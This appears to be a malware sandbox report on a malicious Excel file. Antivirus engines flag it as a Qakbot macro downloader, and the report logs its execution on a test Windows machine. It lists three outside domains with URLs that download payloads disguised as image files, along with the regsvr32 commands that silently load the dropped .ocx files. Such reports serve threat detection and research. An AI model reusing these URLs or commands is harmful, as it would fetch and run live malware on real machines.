Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | April 13, 2022, 12:10 p.m. | April 13, 2022, 12:14 p.m. |
Process | PID | Command line |
---|---|---|
EXCEL.EXE | 2176 | "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\E-1253417553.xlsb |
regsvr32.exe | 2356 | regsvr32 /s C:\..\\Yhdthd.ocx |
regsvr32.exe | 2424 | regsvr32 /s C:\..\\Yhdthd1.ocx |
regsvr32.exe | 2460 | regsvr32 /s C:\..\\Yhdthd2.ocx |
Name | Response | Post-Analysis Lookup |
---|---|---|
ateliecordefeltro.com | 50.116.87.139 | |
lojaalamar.com.br | 192.185.216.64 | |
amalalhamed.com | 162.215.248.83 | |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Type | Value |
---|---|
request | GET http://ateliecordefeltro.com/T9kpu5Vx0ag/Omnh.png7790983516.dat |
request | GET http://lojaalamar.com.br/nokjRAAdeCA/Omnh.png7790983516.dat |
request | GET http://amalalhamed.com/QOqUcVgYi9n/Omnh.png7790983516.dat |
file | Yhdthd2.ocx |
file | Yhdthd.ocx |
file | Yhdthd1.ocx |
cmdline | regsvr32 /s C:\..\\Yhdthd.ocx |
cmdline | regsvr32 /s C:\..\\Yhdthd1.ocx |
cmdline | regsvr32 /s C:\..\\Yhdthd2.ocx |
Engine | Detection |
---|---|
Sangfor | Malware.Generic-XLM.Save.ma35 |
Cyren | XF/SneakyBin.E.gen!Eldorado |
Avast | VBS:Malware-gen |
Kaspersky | HEUR:Trojan.MSOffice.Generic |
Tencent | Trojan.MsOffice.Macro40.11003135 |
McAfee-GW-Edition | X97M/Downloader.lf |
GData | Macro.Trojan-Downloader.Agent.BDH |
Microsoft | TrojanDownloader:O97M/Qakbot.Y!MTB |
ZoneAlarm | HEUR:Trojan.MSOffice.Generic |
McAfee | X97M/Downloader.lf |
Rising | Downloader.Agent/XLM!1.DD1F (CLASSIC) |
Ikarus | Trojan-Downloader.XLM.Agent |
Fortinet | MSExcel/Agent.BDH!tr |
AVG | VBS:Malware-gen |
parent_process | martian_process |
---|---|
excel.exe | regsvr32 /s C:\..\\Yhdthd.ocx |
excel.exe | regsvr32 /s C:\..\\Yhdthd1.ocx |
excel.exe | regsvr32 /s C:\..\\Yhdthd2.ocx |